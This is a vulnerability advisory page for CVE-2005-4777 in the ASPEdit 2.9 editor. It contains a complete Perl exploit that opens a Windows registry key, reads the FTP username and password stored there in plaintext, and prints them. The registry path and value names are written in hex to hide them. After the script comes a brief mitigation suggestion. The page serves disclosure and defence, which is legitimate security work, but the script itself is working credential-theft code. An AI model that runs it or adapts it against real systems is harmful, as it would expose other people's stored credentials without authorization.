ASPEdit FTP Password Disclosure

2005.09.30
Credit: basher13
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2005-4777
CWE: N/A


CVSS Base Score: 4.9/10
Impact Subscore: 6.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: None
Availability impact: None

Version: ASPEdit 2.9 Operating System: - All Windows Typical software: - Shareware Severity Flaw: - high Description: ASPEdit is a powerfulActive Server Pages and HTML editor with full support for Visual BasicScript, Perl, Cold-fusion, PHP3, MIVA ,HDML, WML and Style sheets Vulnerability: A stored for administration password are captured at the Registry Editor,this could local user/guest to see then retrive the password as they have privillage to open registry editor by search specified vulnerable registry values. Exploit: #!usr/bin/perl # # ASPEdit FTP Password Disclosure Exploit # --------------------------------------- # Infam0us Gr0up - Securiti Research # # Info: infamous.2hell.com # Vendor URL: http://www.tashcom.co.uk/aspedit # use Win32::Registry; print "\nASPEdit FTP Password Disclosure Exploit\n"; print "---------------------------------------\n\n"; print "Registrie: HLKM\\SOFTWARE\\tashcom\\aspedit\\ftp\n"; sleep(1); $usr = "\x66\x74\x70\x5f\x75\x73\x65\x72"; $pas = "\x66\x74\x70\x5f\x70\x61\x73\x73\x77\x6f\x64"; $nutt = "\x53\x4f\x46\x54\x57\x41\x52\x45\x5c\x5c". "\x74\x61\x73\x68\x63\x6f\x6d\x5c\x5c\x61". "\x73\x70\x65\x64\x69\x74\x5c\x5c\x66\x74\x70"; print "[+] Start searching..\n"; print "[+] Finding username .."; my $user; $::HKEY_LOCAL_MACHINE->Open("$nutt", $user) or die "Can't open username value: $^E"; sleep(1); print "[OK]\n"; print "[+] Query value username.."; my ($type, $value); $user->QueryValueEx("$usr", $type, $value) or die "No such user: $^E"; sleep(1); print "[OK]\n"; print "[+] Finding password .."; my $pass; $::HKEY_LOCAL_MACHINE->Open("$nutt", $pass) or die "Can't open password value: $^E"; sleep(1); print "[OK]\n"; print "[+] Query value password.."; my ($type1, $value2); $pass->QueryValueEx("$pas", $type1, $value2) or die "No such password: $^E"; sleep(2); print "[OK]\n"; print "[+] Retrive data registry..\n"; sleep(1); print "[*] User: $value\n"; print "[*] Password: $value2\n"; Solution: On the registry Editor changes the registry path then try to encrypt the password,it more safety. Also set them whit permission(Advanced Security Setting),can be found by rigth click the 'key'value then choose 'permission'. Vendor URL: Mail - bugs@tashcom.com WWW - http://www.tashcom.com Published: basher13 (Infam0us Gr0up - Securiti Research) basher13@linuxmail.org / infamous.2hell.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top